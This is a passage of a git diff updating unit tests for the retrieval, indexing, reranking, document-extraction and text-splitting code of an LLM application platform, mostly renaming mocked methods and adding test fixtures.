usage=usage, @@ -1888,7 +1888,7 @@ class TestEmbeddingCachePerformance: latency=0.3, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized], usage=usage, diff --git a/api/tests/unit_tests/core/rag/extractor/test_helpers.py b/api/tests/unit_tests/core/rag/extractor/test_helpers.py new file mode 100644 index 0000000000..edf8735e57 --- /dev/null +++ b/api/tests/unit_tests/core/rag/extractor/test_helpers.py @@ -0,0 +1,10 @@ +import tempfile + +from core.rag.extractor.helpers import FileEncoding, detect_file_encodings + + +def test_detect_file_encodings() -> None: + with tempfile.NamedTemporaryFile(mode="w+t", suffix=".txt") as temp: + temp.write("Shared data") + temp_path = temp.name + assert detect_file_encodings(temp_path) == [FileEncoding(encoding="utf_8", confidence=0.0, language="Unknown")] diff --git a/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py b/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py index 3635e4dbf9..3203aab8c3 100644 --- a/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py +++ b/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py @@ -1,7 +1,10 @@ """Primarily used for testing merged cell scenarios""" +from types import SimpleNamespace + from docx import Document +import core.rag.extractor.word_extractor as we from core.rag.extractor.word_extractor import WordExtractor @@ -47,3 +50,118 @@ def test_parse_row(): extractor = object.__new__(WordExtractor) for idx, row in enumerate(table.rows): assert extractor._parse_row(row, {}, 3) == gt[idx] + + +def test_extract_images_from_docx(monkeypatch): + external_bytes = b"ext-bytes" + internal_bytes = b"int-bytes" + + # Patch storage.save to capture writes + saves: list[tuple[str, bytes]] = [] + + def save(key: str, data: bytes): + saves.append((key, data)) + + monkeypatch.setattr(we, "storage", SimpleNamespace(save=save)) + + # Patch db.session to record adds/commit + class DummySession: + def __init__(self): + self.added = [] + self.committed = False + + def add(self, obj): + self.added.append(obj) + + def commit(self): + self.committed = True + + db_stub = SimpleNamespace(session=DummySession()) + monkeypatch.setattr(we, "db", db_stub) + + # Patch config values used for URL composition and storage type + monkeypatch.setattr(we.dify_config, "FILES_URL", "http://files.local", raising=False) + monkeypatch.setattr(we.dify_config, "STORAGE_TYPE", "local", raising=False) + + # Patch UploadFile to avoid real DB models + class FakeUploadFile: + _i = 0 + + def __init__(self, **kwargs): # kwargs match the real signature fields + type(self)._i += 1 + self.id = f"u{self._i}" + + monkeypatch.setattr(we, "UploadFile", FakeUploadFile) + + # Patch external image fetcher + def fake_get(url: str): + assert url == "https://example.com/image.png" + return SimpleNamespace(status_code=200, headers={"Content-Type": "image/png"}, content=external_bytes) + + monkeypatch.setattr(we, "ssrf_proxy", SimpleNamespace(get=fake_get)) + + # A hashable internal part object with a blob attribute + class HashablePart: + def __init__(self, blob: bytes): + self.blob = blob + + def __hash__(self) -> int: # ensure it can be used as a dict key like real docx parts + return id(self) + + # Build a minimal doc object with both external and internal image rels + internal_part = HashablePart(blob=internal_bytes) + rel_ext = SimpleNamespace(is_external=True, target_ref="https://example.com/image.png") + rel_int = SimpleNamespace(is_external=False, target_ref="word/media/image1.png", target_part=internal_part) + doc = SimpleNamespace(part=SimpleNamespace(rels={"rId1": rel_ext, "rId2": rel_int})) + + extractor = object.__new__(WordExtractor) + extractor.tenant_id = "t1" + extractor.user_id = "u1" + + image_map = extractor._extract_images_from_docx(doc) + + # Returned map should contain entries for external (keyed by rId) and internal (keyed by target_part) + assert set(image_map.keys()) == {"rId1", internal_part} + assert all(v.startswith("![image](") and v.endswith("/file-preview)") for v in image_map.values()) + + # Storage should receive both payloads + payloads = {data for _, data in saves} + assert external_bytes in payloads + assert internal_bytes in payloads + + # DB interactions should be recorded + assert len(db_stub.session.added) == 2 + assert db_stub.session.committed is True + + +def test_extract_images_from_docx_uses_internal_files_url(): + """Test that INTERNAL_FILES_URL takes precedence over FILES_URL for plugin access.""" + # Test the URL generation logic directly + from configs import dify_config + + # Mock the configuration values + original_files_url = getattr(dify_config, "FILES_URL", None) + original_internal_files_url = getattr(dify_config, "INTERNAL_FILES_URL", None) + + try: + # Set both URLs - INTERNAL should take precedence + dify_config.FILES_URL = "http://external.example.com" + dify_config.INTERNAL_FILES_URL = "http://internal.docker:5001" + + # Test the URL generation logic (same as in word_extractor.py) + upload_file_id = "test_file_id" + + # This is the pattern we fixed in the word extractor + base_url = dify_config.INTERNAL_FILES_URL or dify_config.FILES_URL + generated_url = f"{base_url}/files/{upload_file_id}/file-preview" + + # Verify that INTERNAL_FILES_URL is used instead of FILES_URL + assert "http://internal.docker:5001" in generated_url, f"Expected internal URL, got: {generated_url}" + assert "http://external.example.com" not in generated_url, f"Should not use external URL, got: {generated_url}" + + finally: + # Restore original values + if original_files_url is not None: + dify_config.FILES_URL = original_files_url + if original_internal_files_url is not None: + dify_config.INTERNAL_FILES_URL = original_internal_files_url diff --git a/api/tests/unit_tests/core/rag/indexing/test_indexing_runner.py b/api/tests/unit_tests/core/rag/indexing/test_indexing_runner.py index d26e98db8d..c00fee8fe5 100644 --- a/api/tests/unit_tests/core/rag/indexing/test_indexing_runner.py +++ b/api/tests/unit_tests/core/rag/indexing/test_indexing_runner.py @@ -62,7 +62,7 @@ from core.indexing_runner import ( IndexingRunner, ) from core.model_runtime.entities.model_entities import ModelType -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.models.document import ChildDocument, Document from libs.datetime_utils import naive_utc_now from models.dataset import Dataset, DatasetProcessRule @@ -112,7 +112,7 @@ def create_mock_dataset_document( document_id: str | None = None, dataset_id: str | None = None, tenant_id: str | None = None, - doc_form: str = IndexType.PARAGRAPH_INDEX, + doc_form: str = IndexStructureType.PARAGRAPH_INDEX, data_source_type: str = "upload_file", doc_language: str = "English", ) -> Mock: @@ -133,8 +133,8 @@ def create_mock_dataset_document( Mock: A configured mock DatasetDocument object with all required attributes. Example: - >>> doc = create_mock_dataset_document(doc_form=IndexType.QA_INDEX) - >>> assert doc.doc_form == IndexType.QA_INDEX + >>> doc = create_mock_dataset_document(doc_form=IndexStructureType.QA_INDEX) + >>> assert doc.doc_form == IndexStructureType.QA_INDEX """ doc = Mock(spec=DatasetDocument) doc.id = document_id or str(uuid.uuid4()) @@ -276,7 +276,7 @@ class TestIndexingRunnerExtract: doc.id = str(uuid.uuid4()) doc.dataset_id = str(uuid.uuid4()) doc.tenant_id = str(uuid.uuid4()) - doc.doc_form = IndexType.PARAGRAPH_INDEX + doc.doc_form = IndexStructureType.PARAGRAPH_INDEX doc.data_source_type = "upload_file" doc.data_source_info_dict = {"upload_file_id": str(uuid.uuid4())} return doc @@ -616,7 +616,7 @@ class TestIndexingRunnerLoad: doc = Mock(spec=DatasetDocument) doc.id = str(uuid.uuid4()) doc.dataset_id = str(uuid.uuid4()) - doc.doc_form = IndexType.PARAGRAPH_INDEX + doc.doc_form = IndexStructureType.PARAGRAPH_INDEX return doc @pytest.fixture @@ -700,7 +700,7 @@ class TestIndexingRunnerLoad: """Test loading with parent-child index structure.""" # Arrange runner = IndexingRunner() - sample_dataset_document.doc_form = IndexType.PARENT_CHILD_INDEX + sample_dataset_document.doc_form = IndexStructureType.PARENT_CHILD_INDEX sample_dataset.indexing_technique = "high_quality" # Add child documents @@ -775,7 +775,7 @@ class TestIndexingRunnerRun: doc.id = str(uuid.uuid4()) doc.dataset_id = str(uuid.uuid4()) doc.tenant_id = str(uuid.uuid4()) - doc.doc_form = IndexType.PARAGRAPH_INDEX + doc.doc_form = IndexStructureType.PARAGRAPH_INDEX doc.doc_language = "English" doc.data_source_type = "upload_file" doc.data_source_info_dict = {"upload_file_id": str(uuid.uuid4())} @@ -802,6 +802,21 @@ class TestIndexingRunnerRun: mock_process_rule.to_dict.return_value = {"mode": "automatic", "rules": {}} mock_dependencies["db"].session.scalar.return_value = mock_process_rule + # Mock current_user (Account) for _transform + mock_current_user = MagicMock() + mock_current_user.set_tenant_id = MagicMock() + + # Setup db.session.query to return different results based on the model + def mock_query_side_effect(model): + mock_query_result = MagicMock() + if model.__name__ == "Dataset": + mock_query_result.filter_by.return_value.first.return_value = mock_dataset + elif model.__name__ == "Account": + mock_query_result.filter_by.return_value.first.return_value = mock_current_user + return mock_query_result + + mock_dependencies["db"].session.query.side_effect = mock_query_side_effect + # Mock processor mock_processor = MagicMock() mock_dependencies["factory"].return_value.init_index_processor.return_value = mock_processor @@ -1268,7 +1283,7 @@ class TestIndexingRunnerLoadSegments: doc.id = str(uuid.uuid4()) doc.dataset_id = str(uuid.uuid4()) doc.created_by = str(uuid.uuid4()) - doc.doc_form = IndexType.PARAGRAPH_INDEX + doc.doc_form = IndexStructureType.PARAGRAPH_INDEX return doc @pytest.fixture @@ -1316,7 +1331,7 @@ class TestIndexingRunnerLoadSegments: """Test loading segments for parent-child index.""" # Arrange runner = IndexingRunner() - sample_dataset_document.doc_form = IndexType.PARENT_CHILD_INDEX + sample_dataset_document.doc_form = IndexStructureType.PARENT_CHILD_INDEX # Add child documents for doc in sample_documents: @@ -1413,7 +1428,7 @@ class TestIndexingRunnerEstimate: tenant_id=tenant_id, extract_settings=extract_settings, tmp_processing_rule={"mode": "automatic", "rules": {}}, - doc_form=IndexType.PARAGRAPH_INDEX, + doc_form=IndexStructureType.PARAGRAPH_INDEX, ) diff --git a/api/tests/unit_tests/core/rag/rerank/test_reranker.py b/api/tests/unit_tests/core/rag/rerank/test_reranker.py index 4912884c55..ebe6c37818 100644 --- a/api/tests/unit_tests/core/rag/rerank/test_reranker.py +++ b/api/tests/unit_tests/core/rag/rerank/test_reranker.py @@ -26,6 +26,18 @@ from core.rag.rerank.rerank_type import RerankMode from core.rag.rerank.weight_rerank import WeightRerankRunner +def create_mock_model_instance(): + """Create a properly configured mock ModelInstance for reranking tests.""" + mock_instance = Mock(spec=ModelInstance) + # Setup provider_model_bundle chain for check_model_support_vision + mock_instance.provider_model_bundle = Mock() + mock_instance.provider_model_bundle.configuration = Mock() + mock_instance.provider_model_bundle.configuration.tenant_id = "test-tenant-id" + mock_instance.provider = "test-provider" + mock_instance.model = "test-model" + return mock_instance + + class TestRerankModelRunner: """Unit tests for RerankModelRunner. @@ -37,10 +49,23 @@ class TestRerankModelRunner: - Metadata preservation and score injection """ + @pytest.fixture(autouse=True) + def mock_model_manager(self): + """Auto-use fixture to patch ModelManager for all tests in this class.""" + with patch("core.rag.rerank.rerank_model.ModelManager") as mock_mm: + mock_mm.return_value.check_model_support_vision.return_value = False + yield mock_mm + @pytest.fixture def mock_model_instance(self): """Create a mock ModelInstance for reranking.""" mock_instance = Mock(spec=ModelInstance) + # Setup provider_model_bundle chain for check_model_support_vision + mock_instance.provider_model_bundle = Mock() + mock_instance.provider_model_bundle.configuration = Mock() + mock_instance.provider_model_bundle.configuration.tenant_id = "test-tenant-id" + mock_instance.provider = "test-provider" + mock_instance.model = "test-model" return mock_instance @pytest.fixture @@ -803,7 +828,7 @@ class TestRerankRunnerFactory: - Parameters are forwarded to runner constructor """ # Arrange: Mock model instance - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() # Act: Create runner via factory runner = RerankRunnerFactory.create_rerank_runner( @@ -865,7 +890,7 @@ class TestRerankRunnerFactory: - String values are properly matched """ # Arrange: Mock model instance - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() # Act: Create runner using enum value runner = RerankRunnerFactory.create_rerank_runner( @@ -886,6 +911,13 @@ class TestRerankIntegration: - Real-world usage scenarios """ + @pytest.fixture(autouse=True) + def mock_model_manager(self): + """Auto-use fixture to patch ModelManager for all tests in this class.""" + with patch("core.rag.rerank.rerank_model.ModelManager") as mock_mm: + mock_mm.return_value.check_model_support_vision.return_value = False + yield mock_mm + def test_model_reranking_full_workflow(self): """Test complete model-based reranking workflow. @@ -895,7 +927,7 @@ class TestRerankIntegration: - Top results are returned correctly """ # Arrange: Create mock model and documents - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ @@ -951,7 +983,7 @@ class TestRerankIntegration: - Normalization is consistent """ # Arrange: Create mock model with various scores - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ @@ -991,6 +1023,13 @@ class TestRerankEdgeCases: - Concurrent reranking scenarios """ + @pytest.fixture(autouse=True) + def mock_model_manager(self): + """Auto-use fixture to patch ModelManager for all tests in this class.""" + with patch("core.rag.rerank.rerank_model.ModelManager") as mock_mm: + mock_mm.return_value.check_model_support_vision.return_value = False + yield mock_mm + def test_rerank_with_empty_metadata(self): """Test reranking when documents have empty metadata. @@ -1000,7 +1039,7 @@ class TestRerankEdgeCases: - Empty metadata documents are processed correctly """ # Arrange: Create documents with empty metadata - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ @@ -1046,7 +1085,7 @@ class TestRerankEdgeCases: - Score comparison logic works at boundary """ # Arrange: Create mock with various scores including negatives - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ @@ -1082,7 +1121,7 @@ class TestRerankEdgeCases: - No overflow or precision issues """ # Arrange: All documents with perfect scores - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ @@ -1117,7 +1156,7 @@ class TestRerankEdgeCases: - Content encoding is preserved """ # Arrange: Documents with special characters - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ @@ -1159,7 +1198,7 @@ class TestRerankEdgeCases: - Content is not truncated unexpectedly """ # Arrange: Documents with very long content - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() long_content = "This is a very long document. " * 1000 # ~30,000 characters mock_rerank_result = RerankResult( @@ -1196,7 +1235,7 @@ class TestRerankEdgeCases: - All documents are processed correctly """ # Arrange: Create 100 documents - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() num_docs = 100 # Create rerank results for all documents @@ -1287,7 +1326,7 @@ class TestRerankEdgeCases: - Documents can still be ranked """ # Arrange: Empty query - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ @@ -1325,6 +1364,13 @@ class TestRerankPerformance: - Score calculation optimization """ + @pytest.fixture(autouse=True) + def mock_model_manager(self): + """Auto-use fixture to patch ModelManager for all tests in this class.""" + with patch("core.rag.rerank.rerank_model.ModelManager") as mock_mm: + mock_mm.return_value.check_model_support_vision.return_value = False + yield mock_mm + def test_rerank_batch_processing(self): """Test that documents are processed in a single batch. @@ -1334,7 +1380,7 @@ class TestRerankPerformance: - Efficient batch processing """ # Arrange: Multiple documents - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[RerankDocument(index=i, text=f"Doc {i}", score=0.9 - i * 0.1) for i in range(5)], @@ -1435,6 +1481,13 @@ class TestRerankErrorHandling: - Error propagation """ + @pytest.fixture(autouse=True) + def mock_model_manager(self): + """Auto-use fixture to patch ModelManager for all tests in this class.""" + with patch("core.rag.rerank.rerank_model.ModelManager") as mock_mm: + mock_mm.return_value.check_model_support_vision.return_value = False + yield mock_mm + def test_rerank_model_invocation_error(self): """Test handling of model invocation errors. @@ -1444,7 +1497,7 @@ class TestRerankErrorHandling: - Error context is preserved """ # Arrange: Mock model that raises exception - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_model_instance.invoke_rerank.side_effect = RuntimeError("Model invocation failed") documents = [ @@ -1470,7 +1523,7 @@ class TestRerankErrorHandling: - Invalid results don't corrupt output """ # Arrange: Rerank result with invalid index - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ diff --git a/api/tests/unit_tests/core/rag/retrieval/test_dataset_retrieval.py b/api/tests/unit_tests/core/rag/retrieval/test_dataset_retrieval.py index 0163e42992..affd6c648f 100644 --- a/api/tests/unit_tests/core/rag/retrieval/test_dataset_retrieval.py +++ b/api/tests/unit_tests/core/rag/retrieval/test_dataset_retrieval.py @@ -425,15 +425,15 @@ class TestRetrievalService: # ==================== Vector Search Tests ==================== - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_vector_search_basic(self, mock_get_dataset, mock_embedding_search, mock_dataset, sample_documents): + def test_vector_search_basic(self, mock_get_dataset, mock_retrieve, mock_dataset, sample_documents): """ Test basic vector/semantic search functionality. This test validates the core vector search flow: 1. Dataset is retrieved from database - 2. embedding_search is called via ThreadPoolExecutor + 2. _retrieve is called via ThreadPoolExecutor 3. Documents are added to shared all_documents list 4. Results are returned to caller @@ -447,28 +447,28 @@ class TestRetrievalService: # Set up the mock dataset that will be "retrieved" from database mock_get_dataset.return_value = mock_dataset - # Create a side effect function that simulates embedding_search behavior - # In the real implementation, embedding_search: - # 1. Gets the dataset - # 2. Creates a Vector instance - # 3. Calls search_by_vector with embeddings - # 4. Extends all_documents with results - def side_effect_embedding_search( + # Create a side effect function that simulates _retrieve behavior + # _retrieve modifies the all_documents list in place + def side_effect_retrieve( flask_app, - dataset_id, - query, - top_k, - score_threshold, - reranking_model, - all_documents, retrieval_method, - exceptions, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): - """Simulate embedding_search adding documents to the shared list.""" - all_documents.extend(sample_documents) + """Simulate _retrieve adding documents to the shared list.""" + if all_documents is not None: + all_documents.extend(sample_documents) - mock_embedding_search.side_effect = side_effect_embedding_search + mock_retrieve.side_effect = side_effect_retrieve # Define test parameters query = "What is Python?" # Natural language query @@ -481,7 +481,7 @@ class TestRetrievalService: # 1. Check if query is empty (early return if so) # 2. Get the dataset using _get_dataset # 3. Create ThreadPoolExecutor - # 4. Submit embedding_search task + # 4. Submit _retrieve task # 5. Wait for completion # 6. Return all_documents list results = RetrievalService.retrieve( @@ -502,15 +502,13 @@ class TestRetrievalService: # Verify documents maintain their scores (highest score first in sample_documents) assert results[0].metadata["score"] == 0.95, "First document should have highest score from sample_documents" - # Verify embedding_search was called exactly once + # Verify _retrieve was called exactly once # This confirms the search method was invoked by ThreadPoolExecutor - mock_embedding_search.assert_called_once() + mock_retrieve.assert_called_once() - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_vector_search_with_document_filter( - self, mock_get_dataset, mock_embedding_search, mock_dataset, sample_documents - ): + def test_vector_search_with_document_filter(self, mock_get_dataset, mock_retrieve, mock_dataset, sample_documents): """ Test vector search with document ID filtering. @@ -522,21 +520,25 @@ class TestRetrievalService: mock_get_dataset.return_value = mock_dataset filtered_docs = [sample_documents[0]] - def side_effect_embedding_search( + def side_effect_retrieve( flask_app, - dataset_id, - query, - top_k, - score_threshold, - reranking_model, - all_documents, retrieval_method, - exceptions, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): - all_documents.extend(filtered_docs) + if all_documents is not None: + all_documents.extend(filtered_docs) - mock_embedding_search.side_effect = side_effect_embedding_search + mock_retrieve.side_effect = side_effect_retrieve document_ids_filter = [sample_documents[0].metadata["document_id"]] # Act @@ -552,12 +554,12 @@ class TestRetrievalService: assert len(results) == 1 assert results[0].metadata["doc_id"] == "doc1" # Verify document_ids_filter was passed - call_kwargs = mock_embedding_search.call_args.kwargs + call_kwargs = mock_retrieve.call_args.kwargs assert call_kwargs["document_ids_filter"] == document_ids_filter - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_vector_search_empty_results(self, mock_get_dataset, mock_embedding_search, mock_dataset): + def test_vector_search_empty_results(self, mock_get_dataset, mock_retrieve, mock_dataset): """ Test vector search when no results match the query. @@ -567,8 +569,8 @@ class TestRetrievalService: """ # Arrange mock_get_dataset.return_value = mock_dataset - # embedding_search doesn't add anything to all_documents - mock_embedding_search.side_effect = lambda *args, **kwargs: None + # _retrieve doesn't add anything to all_documents + mock_retrieve.side_effect = lambda *args, **kwargs: None # Act results = RetrievalService.retrieve( @@ -583,9 +585,9 @@ class TestRetrievalService: # ==================== Keyword Search Tests ==================== - @patch("core.rag.datasource.retrieval_service.RetrievalService.keyword_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_keyword_search_basic(self, mock_get_dataset, mock_keyword_search, mock_dataset, sample_documents): + def test_keyword_search_basic(self, mock_get_dataset, mock_retrieve, mock_dataset, sample_documents): """ Test basic keyword search functionality. @@ -597,12 +599,25 @@ class TestRetrievalService: # Arrange mock_get_dataset.return_value = mock_dataset - def side_effect_keyword_search( - flask_app, dataset_id, query, top_k, all_documents, exceptions, document_ids_filter=None + def side_effect_retrieve( + flask_app, + retrieval_method, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, + document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): - all_documents.extend(sample_documents) + if all_documents is not None: + all_documents.extend(sample_documents) - mock_keyword_search.side_effect = side_effect_keyword_search + mock_retrieve.side_effect = side_effect_retrieve query = "Python programming" top_k = 3 @@ -618,7 +633,7 @@ class TestRetrievalService: # Assert assert len(results) == 3 assert all(isinstance(doc, Document) for doc in results) - mock_keyword_search.assert_called_once() + mock_retrieve.assert_called_once() @patch("core.rag.datasource.retrieval_service.RetrievalService.keyword_search") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") @@ -1147,11 +1162,9 @@ class TestRetrievalService: # ==================== Metadata Filtering Tests ==================== - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_vector_search_with_metadata_filter( - self, mock_get_dataset, mock_embedding_search, mock_dataset, sample_documents - ): + def test_vector_search_with_metadata_filter(self, mock_get_dataset, mock_retrieve, mock_dataset, sample_documents): """ Test vector search with metadata-based document filtering. @@ -1166,21 +1179,25 @@ class TestRetrievalService: filtered_doc = sample_documents[0] filtered_doc.metadata["category"] = "programming" - def side_effect_embedding( + def side_effect_retrieve( flask_app, - dataset_id, - query, - top_k, - score_threshold, - reranking_model, - all_documents, retrieval_method, - exceptions, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): - all_documents.append(filtered_doc) + if all_documents is not None: + all_documents.append(filtered_doc) - mock_embedding_search.side_effect = side_effect_embedding + mock_retrieve.side_effect = side_effect_retrieve # Act results = RetrievalService.retrieve( @@ -1243,9 +1260,9 @@ class TestRetrievalService: # Assert assert results == [] - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_retrieve_with_exception_handling(self, mock_get_dataset, mock_embedding_search, mock_dataset): + def test_retrieve_with_exception_handling(self, mock_get_dataset, mock_retrieve, mock_dataset): """ Test that exceptions during retrieval are properly handled. @@ -1256,22 +1273,26 @@ class TestRetrievalService: # Arrange mock_get_dataset.return_value = mock_dataset - # Make embedding_search add an exception to the exceptions list + # Make _retrieve add an exception to the exceptions list def side_effect_with_exception( flask_app, - dataset_id, - query, - top_k, - score_threshold, - reranking_model, - all_documents, retrieval_method, - exceptions, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): - exceptions.append("Search failed") + if exceptions is not None: + exceptions.append("Search failed") - mock_embedding_search.side_effect = side_effect_with_exception + mock_retrieve.side_effect = side_effect_with_exception # Act & Assert with pytest.raises(ValueError) as exc_info: @@ -1286,9 +1307,9 @@ class TestRetrievalService: # ==================== Score Threshold Tests ==================== - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_vector_search_with_score_threshold(self, mock_get_dataset, mock_embedding_search, mock_dataset): + def test_vector_search_with_score_threshold(self, mock_get_dataset, mock_retrieve, mock_dataset): """ Test vector search with score threshold filtering. @@ -1306,21 +1327,25 @@ class TestRetrievalService: provider="dify", ) - def side_effect_embedding( + def side_effect_retrieve( flask_app, - dataset_id, - query, - top_k, - score_threshold, - reranking_model, - all_documents, retrieval_method, - exceptions, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): - all_documents.append(high_score_doc) + if all_documents is not None: + all_documents.append(high_score_doc) - mock_embedding_search.side_effect = side_effect_embedding + mock_retrieve.side_effect = side_effect_retrieve score_threshold = 0.8 @@ -1339,9 +1364,9 @@ class TestRetrievalService: # ==================== Top-K Limiting Tests ==================== - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_retrieve_respects_top_k_limit(self, mock_get_dataset, mock_embedding_search, mock_dataset): + def test_retrieve_respects_top_k_limit(self, mock_get_dataset, mock_retrieve, mock_dataset): """ Test that retrieval respects top_k parameter. @@ -1362,22 +1387,26 @@ class TestRetrievalService: for i in range(10) ] - def side_effect_embedding( + def side_effect_retrieve( flask_app, - dataset_id, - query, - top_k, - score_threshold, - reranking_model, - all_documents, retrieval_method, - exceptions, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): # Return only top_k documents - all_documents.extend(many_docs[:top_k]) + if all_documents is not None: + all_documents.extend(many_docs[:top_k]) - mock_embedding_search.side_effect = side_effect_embedding + mock_retrieve.side_effect = side_effect_retrieve top_k = 3 @@ -1390,9 +1419,9 @@ class TestRetrievalService: ) # Assert - # Verify top_k was passed to embedding_search - assert mock_embedding_search.called - call_kwargs = mock_embedding_search.call_args.kwargs + # Verify _retrieve was called + assert mock_retrieve.called + call_kwargs = mock_retrieve.call_args.kwargs assert call_kwargs["top_k"] == top_k # Verify we got the right number of results assert len(results) == top_k @@ -1421,11 +1450,9 @@ class TestRetrievalService: # ==================== Reranking Tests ==================== - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_semantic_search_with_reranking( - self, mock_get_dataset, mock_embedding_search, mock_dataset, sample_documents - ): + def test_semantic_search_with_reranking(self, mock_get_dataset, mock_retrieve, mock_dataset, sample_documents): """ Test semantic search with reranking model. @@ -1439,22 +1466,26 @@ class TestRetrievalService: # Simulate reranking changing order reranked_docs = list(reversed(sample_documents)) - def side_effect_embedding( + def side_effect_retrieve( flask_app, - dataset_id, - query, - top_k, - score_threshold, - reranking_model, - all_documents, retrieval_method, - exceptions, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): - # embedding_search handles reranking internally - all_documents.extend(reranked_docs) + # _retrieve handles reranking internally + if all_documents is not None: + all_documents.extend(reranked_docs) - mock_embedding_search.side_effect = side_effect_embedding + mock_retrieve.side_effect = side_effect_retrieve reranking_model = { "reranking_provider_name": "cohere", @@ -1473,7 +1504,7 @@ class TestRetrievalService: # Assert # For semantic search with reranking, reranking_model should be passed assert len(results) == 3 - call_kwargs = mock_embedding_search.call_args.kwargs + call_kwargs = mock_retrieve.call_args.kwargs assert call_kwargs["reranking_model"] == reranking_model diff --git a/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py b/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py index 7d246ac3cc..943a9e5712 100644 --- a/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py +++ b/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py @@ -901,6 +901,13 @@ class TestFixedRecursiveCharacterTextSplitter: # Verify no empty chunks assert all(len(chunk) > 0 for chunk in result) + def test_double_slash_n(self): + data = "chunk 1\n\nsubchunk 1.\nsubchunk 2.\n\n---\n\nchunk 2\n\nsubchunk 1\nsubchunk 2." + separator = "\\n\\n---\\n\\n" + splitter = FixedRecursiveCharacterTextSplitter(fixed_separator=separator) + chunks = splitter.split_text(data) + assert chunks == ["chunk 1\n\nsubchunk 1.\nsubchunk 2.", "chunk 2\n\nsubchunk 